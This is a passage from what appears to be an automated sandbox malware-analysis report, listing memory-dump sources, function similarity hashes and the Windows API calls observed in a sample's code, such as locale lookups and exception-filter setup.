            • Instruction Fuzzy Hash: D55160B1D012198FEB14CF68E8857AABBF9FB44314F18852AD405EB3A8D774D940EF51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: onqp
            • API String ID: 0-1718216680
            • Opcode ID: 392c672f0f5f843473e563fb61777e150b162c9c1a084cb5cd8fb84007401180
            • Instruction ID: b59d6efea4c23021bcd720f0cb7e1131572a00fbba50923feede9af16a839401
            • Opcode Fuzzy Hash: 392c672f0f5f843473e563fb61777e150b162c9c1a084cb5cd8fb84007401180
            • Instruction Fuzzy Hash: 24C1C0B16083128BE714CF18C89076BBBE2EF95724F588A2DF5D597385D379D809CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: 0
            • API String ID: 0-4108050209
            • Opcode ID: a1a29ef08012ab33962dd12958d4a2b2c65bae06b10c20ba0cdb5aecddd01d6a
            • Instruction ID: 51cf2392e2ce3768c2ba96428b0197487b07b78da25ae7a23cf04cff2c23c688
            • Opcode Fuzzy Hash: a1a29ef08012ab33962dd12958d4a2b2c65bae06b10c20ba0cdb5aecddd01d6a
            • Instruction Fuzzy Hash: 30C1DF7190064ACFCB24CF68C894ABEB7A3AF05320F2D461BD556D7392C735AD46EB81
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE2A40: GetLastError.KERNEL32(?,00000008,00FE879F,00000000,00FDA890), ref: 00FE2A44
              • Part of subcall function 00FE2A40: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FE2AE6
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEC114
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast$InfoLocale
            • String ID:
            • API String ID: 3736152602-0
            • Opcode ID: 87d36a96e8aa07fcb9c16c62c04dfd233ced83dceea5c40622b461d85e62b735
            • Instruction ID: 125a065e1e5f205689a8a4070f27c0b4c5b9faacf20adb31ba3ea5dc5e8cc6ac
            • Opcode Fuzzy Hash: 87d36a96e8aa07fcb9c16c62c04dfd233ced83dceea5c40622b461d85e62b735
            • Instruction Fuzzy Hash: 08219572A11286ABDF289A26DC41B7B77ACEF45714F10007AFD06D6143EB7DED02A790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE2A40: GetLastError.KERNEL32(?,00000008,00FE879F,00000000,00FDA890), ref: 00FE2A44
              • Part of subcall function 00FE2A40: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FE2AE6
            • EnumSystemLocalesW.KERNEL32(00FEBE6D,00000001,00000000,?,-00000050,?,00FEC49E,00000000,?,?,?,00000055,?), ref: 00FEBDB9
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem
            • String ID:
            • API String ID: 2417226690-0
            • Opcode ID: 9dab257a0f6574d5896276d8effdfeef17a901917c8161bb73d375820d6d19dc
            • Instruction ID: 020a5c4ceb9adf637ff73097f1d0ae082b0987e6fcd249d1874f3eb033e34be4
            • Opcode Fuzzy Hash: 9dab257a0f6574d5896276d8effdfeef17a901917c8161bb73d375820d6d19dc
            • Instruction Fuzzy Hash: CA11E5376007055FDB289F3AC8A16BBBB91FF80768B18453CE98687B40E775A942D740
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: 7452
            • API String ID: 0-87867774
            • Opcode ID: f991de6c88c0eddb8f88ed6c652c9c24a37a0ba3baf89028ecb4da3c24b50ce6
            • Instruction ID: 7c9f9cab6b79832d364e6e8a4921915c55e596df87b6bea0b69c66f200387eba
            • Opcode Fuzzy Hash: f991de6c88c0eddb8f88ed6c652c9c24a37a0ba3baf89028ecb4da3c24b50ce6
            • Instruction Fuzzy Hash: FDA1ADB56043028BD724CF68C490B6BBBE6FFC9354F54895CE9C99B260E730E845CB92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE2A40: GetLastError.KERNEL32(?,00000008,00FE879F,00000000,00FDA890), ref: 00FE2A44
              • Part of subcall function 00FE2A40: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FE2AE6
            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FEC089,00000000,00000000,?), ref: 00FEC31B
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast$InfoLocale
            • String ID:
            • API String ID: 3736152602-0
            • Opcode ID: 4aabfba9d70904f857cd113c8a92e9c8e6ee425bab59ab7c371a1e05e0a73ec7
            • Instruction ID: 46011731c7622bc7c374a7e4036bca7d00bd4ab8a67cef6e5af0bf19a3162914
            • Opcode Fuzzy Hash: 4aabfba9d70904f857cd113c8a92e9c8e6ee425bab59ab7c371a1e05e0a73ec7
            • Instruction Fuzzy Hash: CBF0F932A00151AFDF385B668C057BB7768FB40764F188438FC06A3140EA74FD02E6D0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE2A40: GetLastError.KERNEL32(?,00000008,00FE879F,00000000,00FDA890), ref: 00FE2A44
              • Part of subcall function 00FE2A40: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FE2AE6
            • EnumSystemLocalesW.KERNEL32(00FEC0C0,00000001,?,?,-00000050,?,00FEC462,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FEBE2C
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem
            • String ID:
            • API String ID: 2417226690-0
            • Opcode ID: 75d839166d2f1294aff81cf089ada1fefab970957d33f1c0522f6d4c8c9511f6
            • Instruction ID: aab2a258d98c5e1c70fffa6888d3c30fa4c82f50ed7864706d84279e4214e3b6
            • Opcode Fuzzy Hash: 75d839166d2f1294aff81cf089ada1fefab970957d33f1c0522f6d4c8c9511f6
            • Instruction Fuzzy Hash: 50F0F6362003445FDB245F369C81ABB7B95FF80768B05843CFA458B680D7B59C02E750
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FDCD04: EnterCriticalSection.KERNEL32(?,?,00FE2718,?,00FFC338,00000008,00FE28DC,?,?,?), ref: 00FDCD13
            • EnumSystemLocalesW.KERNEL32(Function_00015015,00000001,00FFC3F8,0000000C,00FE5444,?), ref: 00FE505A
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CriticalEnterEnumLocalesSectionSystem
            • String ID:
            • API String ID: 1272433827-0
            • Opcode ID: bf5048eab482b54bf5d4329b478a1517674b1008097a0c07142169f1b982233f
            • Instruction ID: 2a43c137f413adf77a0fee76a594cda8bbd3a7d4e096fed7cce0f307c9df65f9
            • Opcode Fuzzy Hash: bf5048eab482b54bf5d4329b478a1517674b1008097a0c07142169f1b982233f
            • Instruction Fuzzy Hash: 2EF03732A10209DFDB00DF98E842BA977A1FB45720F00852AF511EB3A0DB799904EB81
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE2A40: GetLastError.KERNEL32(?,00000008,00FE879F,00000000,00FDA890), ref: 00FE2A44
              • Part of subcall function 00FE2A40: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FE2AE6
            • EnumSystemLocalesW.KERNEL32(00FEBC55,00000001,?,?,?,00FEC4C0,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FEBD33
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem
            • String ID:
            • API String ID: 2417226690-0
            • Opcode ID: 563222cb7f047c23c5914fdb6cd316c805a192f33ffe9baff0927349a6c50799
            • Instruction ID: 881e76046d477ab738e8d399240d8510a173ad0898887fee7d1b01d9f169b7ea
            • Opcode Fuzzy Hash: 563222cb7f047c23c5914fdb6cd316c805a192f33ffe9baff0927349a6c50799
            • Instruction Fuzzy Hash: 3EF0553670024557CB249F3ACC0576BBF94EFC1720F064068FA0A8B241CBB6D842E790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FE15B4,?,20001004,00000000,00000002,?,?,00FE0BB6), ref: 00FE557C
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: 00a3709959ebe53791a7bfee58b434ce4dbeff9eb9006fcf009391828f76507a
            • Instruction ID: be0815554d30c21f8ed4220aa3a021551a982546c2efbf43992cc33f2a897125
            • Opcode Fuzzy Hash: 00a3709959ebe53791a7bfee58b434ce4dbeff9eb9006fcf009391828f76507a
            • Instruction Fuzzy Hash: 72E04F32901A68BBCF122F62DC08BAE7F1AEF44B64F158010FC0565221CB368E20BA94
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: 7452
            • API String ID: 0-87867774
            • Opcode ID: 1809e20e3f23662281c548d50d04dfc6ab585ca6f3d14599bfd9da46ae832b44
            • Instruction ID: b03b1cbe81e7b50d9b46ba8ae6fd0ebc51f2cecd5042eb30bdf03df646d72a04
            • Opcode Fuzzy Hash: 1809e20e3f23662281c548d50d04dfc6ab585ca6f3d14599bfd9da46ae832b44
            • Instruction Fuzzy Hash: 6191AA72A043128BD714CF58C490BABB7E5FFC9314F95895CE9C66B290C730E815CB92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_00006945,00FD5F70), ref: 00FD693E
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: dc8b1460647d9d2b5b3c1cb2a3b7c86705a4bcb09e677bf440c66309802e557b
            • Instruction ID: cf945c7b979ef3e399ec0ae3700de67f50c7c550bde259f0f7b08cf77aa98b28
            • Opcode Fuzzy Hash: dc8b1460647d9d2b5b3c1cb2a3b7c86705a4bcb09e677bf440c66309802e557b
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: onqp
            • API String ID: 0-1718216680
            • Opcode ID: 39575cc2b615a24154d1ec98806dbbd23d7e6a9b8f555456a4cc557337b3cbcf
            • Instruction ID: f041cf2a0d7bb195b1f34cefc16406564c507e8daf2064f9236c689124336cf0
            • Opcode Fuzzy Hash: 39575cc2b615a24154d1ec98806dbbd23d7e6a9b8f555456a4cc557337b3cbcf
            • Instruction Fuzzy Hash: 4551ABB12083018BE718CF08C4A472FBBE6FBC4714F288A5DF4961B292D775D845CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: 7452
            • API String ID: 0-87867774
            • Opcode ID: b9ef0a89410306efc5c2d7b9def9ae958c6701a9207dc64f3d3e779a784eb048
            • Instruction ID: ac32fba83671ca987b2dec04c9f004e7adc8f717531a04f9e6e0f0967f28763b
            • Opcode Fuzzy Hash: b9ef0a89410306efc5c2d7b9def9ae958c6701a9207dc64f3d3e779a784eb048
            • Instruction Fuzzy Hash: 1851C9762083019BF314CF18CA94B6BBBE6EBC5344F14891DE5C5AB290D374E945CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: 7452
            • API String ID: 0-87867774
            • Opcode ID: 29de46730035695dba39fe0c5faf9dc6f01efe950b5727a8a298d0f059a49c0e
            • Instruction ID: d7aee431e484d8d18f2677b6976f4e7f892a5219f920642fb8c4b0781953647e
            • Opcode Fuzzy Hash: 29de46730035695dba39fe0c5faf9dc6f01efe950b5727a8a298d0f059a49c0e
            • Instruction Fuzzy Hash: F051BCB5204301ABE314CF48C980B6BBBF6EBC5744F54891CF5C55B290C375E949CB86
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HeapProcess
            • String ID:
            • API String ID: 54951025-0
            • Opcode ID: 5960ada59bdfd099edf632d6201ab92b6a20f32b6a1f0dcc8cb815f920201f9d
            • Instruction ID: 09c7142ce7a8be141ae42d157c3863af6279a93c3df6c166a382d748dc0df09e
            • Opcode Fuzzy Hash: 5960ada59bdfd099edf632d6201ab92b6a20f32b6a1f0dcc8cb815f920201f9d
            • Instruction Fuzzy Hash: A5A0113020220A8B83008F32AA0820E3AE8BE082C0300A028A800C8230EA288800AB02
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 704b87d1b9c676f88e1c07b0446b889827816cb16b5e5fb0875026c9d654919f
            • Instruction ID: d94627f8bd3327223c1b5ed0187219ce96c44ab264a40341e6ab0e941ac49ca5
            • Opcode Fuzzy Hash: 704b87d1b9c676f88e1c07b0446b889827816cb16b5e5fb0875026c9d654919f
            • Instruction Fuzzy Hash: A252D2719083118BE726DF1CD8802BEB3E2FFC4315F198A6DD9C697281D736A965CB42
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 405badcde3d6b64d8339dbb199358104ac972eded07c6d2cad8e1c47b1b436aa
            • Instruction ID: dbff90923f773f8d530493f335b2f7879a8d13bf99d15806b04e764b8aed72fc
            • Opcode Fuzzy Hash: 405badcde3d6b64d8339dbb199358104ac972eded07c6d2cad8e1c47b1b436aa
            • Instruction Fuzzy Hash: 6D424374504B518FE36ACF28C98866ABBE1BF85310F948A2DE5D78BB90D735F845CB10
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
